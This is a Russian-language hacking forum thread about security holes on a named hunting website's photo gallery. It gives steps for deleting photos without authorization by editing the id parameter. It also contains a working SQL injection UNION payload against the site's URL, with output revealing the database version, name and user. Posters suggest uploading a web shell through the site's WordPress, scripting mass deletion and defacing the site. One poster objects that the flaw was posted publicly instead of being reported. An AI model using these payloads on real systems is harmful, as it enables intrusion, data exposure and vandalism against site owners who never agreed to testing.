Камский водяной

Ковырял, инжекты и наткнулся на фиерический косяк у трешового сайта, даже захотелось исходники глянуть, дабы вкусить всю прелесть русского гения.

Так вот бага в галерее:
1. Возьмем допустим эту фото
http://www.myhunting.ru/gallery/images.php?id=78
2. Минусуем id (?id=-78)
3. Появляется кнопка "Удалить фото", кликаем, убираем минус id, обновляем.

Авторизация? Нет не слышал, мы уже удалил фотографию, спасибо досвидания.

 

и че?

 

а чё должно быть?

 

теперь напиши скрипт, который проделает это от 1 до ~доxyя

 

Если бы это имело какой-то профит, наверняка я бы тему не в болталке создавал.

 

Ну вот, нашел дырку на хорошем интересном ресурсе и сразу в паблик.
Нет. ну руки бы за такое поотрывал.

Нет, чтобы сообщить админу ресурса, он это в болталку закинул. где толпа школоты, только и ждущей, как бы, где-нибудь насрать.

 

1. С любым id показывает одно и то же фото.
2. Кнопка "Удалить фото" есть всегда, минус не нужен.
3. При нажатии кнопки ничего не удаляется.

 

Да? Глупость, вы батенька пишете.
http://rghost.ru/49801497

.)
Я сегодня с утра еще инжект на офф сайте Анфисы Чеховой нашол, и то же на форум выложил, вот такое я говно.

 

Титьке видел?

 

Разве что, своей жены. Кстати хорошая идея для дефейса была бы, логотип на грудак ей
P.s. Отличный блог у тебя, вчера зачитался, потом еще ссылку на hack.me нашел, пол ночи залипал.

 

заводы стоят, одни хакеры гитаристы и чиновники в стране, bлять

 

ты - говно

нам нужно больше рабочей силы, еще больше!

 

к слову
www.myhunting.ru/gallery/images.php?id=47+union+all+select+concat_ws(0x3a,version(),database(),user()),null,null,null,null,null,null#
5.5.31-0+wheezy1:user18454_gallery:user18454_hunt@localhost

там стоит вордпрес чрез него лейте шел

 

Разобрался уже. На любой несуществующей фотографии есть кнопка "удалить" - http://www.myhunting.ru/gallery/images.php?id=78

 

какой язык - язык вирусов(высокоуровневый)

 

VBS, Delphy, excel?

 

////